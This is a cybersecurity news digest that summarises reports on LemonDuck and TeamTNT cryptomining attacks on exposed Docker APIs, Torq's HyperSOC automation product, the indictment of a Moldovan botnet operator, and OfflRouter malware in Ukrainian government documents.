BleepingComputer reports that LemonDuck botnet operators have launched an ongoing widespread cryptomining campaign targeted at Docker APIs on Linux servers.
CrowdStrike researchers have discovered that after accessing exposed Docker APIs, LemonDuck has been executing a malicious container to facilitate PNG image-spoofing Bash script retrieval. The Bash file was then observed to kill cryptocurrency mining-related processes, daemons, and network connections to other cryptomining groups' command-and-control servers, as well as erase known indicator of compromise file paths, and deactivate the tracking service of Alibaba Cloud. Execution of the XMRig cryptomining utility and a configuration file concealing the wallets of the attacker then follow, according to the report. Moreover, filesystem-based SSH keys are being leveraged by LemonDuck to move laterally across impacted networks. A separate report from Cisco Talos has noted that exposed AWS Docker API instances are also being attacked by the TeamTNT threat group, which has also been mining cryptocurrency while preventing detection by deactivating cloud security systems.
SiliconAngle reports that mounting security alert fatigue has prompted Torq to introduce its new HyperSOC system based on its Hyperautomation Platform using artificial intelligence to enable security operation center response automation, management, and monitoring in a bid to bolster the investigation and remediation of cybersecurity threats.
Moldovan botnet operator Alexander Lefterov, also known as Alipatime, Alipako, and Uptime, has been indicted by the U.S. Department of Justice for his involvement in widespread attacks against U.S.-based computers, BleepingComputer reports.
CyberScoop reports that over 100 Ukrainian local government and police documents uploaded to VirusTotal in February were discovered to have been infected with the OfflRouter malware, which dates back to 2015 and could only spread through already compromised files and removable media devices.